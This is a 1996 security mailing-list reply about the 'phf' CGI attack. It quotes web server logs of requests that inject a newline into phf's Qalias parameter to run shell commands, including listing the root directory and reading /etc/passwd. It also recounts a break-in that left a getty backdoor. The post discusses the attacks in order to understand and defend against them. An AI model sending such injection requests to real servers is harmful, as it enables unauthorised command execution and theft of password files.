[2955] in WWW Security List Archive
Re: 'phf' cgi-bin attack
daemon@ATHENA.MIT.EDU (Morgan A. Miskell)
Tue Sep 17 11:40:11 1996
Date: Tue, 17 Sep 1996 09:57:24 -0400
From: "Morgan A. Miskell" <mormis@caro.net>
To: "Jordi \"Matemātic\" Salvat" <jordi@webarna.com>
CC: www-security@ns2.rutgers.edu
Errors-To: owner-www-security@ns2.rutgers.edu
Jordi "Matem=E0tic" Salvat wrote:
>=20
> Many Spanish ISPs are receiving attack attempts on their WWW servers...
> they detect them on their log files in entries such as:
>=20
> info26.jet.es - - [04/Sep/1996:03:17:21 +0100] "GET
> /cgi-bin/phf?Qalias=3Dx%0a/bin/ls%20-la%20/ HTTP/1.0" 404 -
> infovia36_bcn.tinet.fut.es - - [04/Sep/1996:08:52:05 +0100] "GET
> /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
> ia245.arrakis.es - - [04/Sep/1996:14:45:35 +0100] "GET
> /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
> modem5.mrbit.es - - [09/Sep/1996:04:38:21 +0100] "GET
> /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
> modem5.mrbit.es - - [09/Sep/1996:06:15:21 +0100] "GET
> /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
> ppp03.las.es - - [12/Sep/1996:20:17:22 +0100] "GET
> /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
>=20
> Obviously attempting to get the passwd file.
>=20
> What is curious about these attacks is that they all come from differen=
t
> dial-up providers, from users apparently scattered throughout Spain.
> Maybe an "organized" group who meets and exchanges ideas over the I-net=
?
> There has also been a few attempts apparently comming from the US. Of
> course most providers have initiated action to find out who those
> cracker-apprentices are, and warn them that what they are doing is a
> delict under the new Spanish Penal Laws.
>=20
> At lease one of these attacks has been successful. The hacker then
> reportedly managed to find out root password (bad password choice?) and
> replaced the getty and getty to leave a 'backdoor'. The hacker was
> reportedly invisible to 'who' and 'last', so the only way to know
> whether he was logged in was to look at the process list.
>=20
> Does anyone know what this 'phf' cgi-bin is supposed to be?
>=20
> Thanks for your help.
> --
> Jordi Salvat i Alabart
> Web Edicions Barcelona
> edicions i consultoria Internet
> http://www.webarna.com
Here is some addition information I have found.....
1. phf is ph form which comes as part of standard Apache and
probably many other Servers.
2. The program uses ph servers to "borrow" the information from your
machine.
3. The program uses PH but it will work using say the default ph
server which ns.uiuc.edu....so removing or changing permissions
on ph will not help.
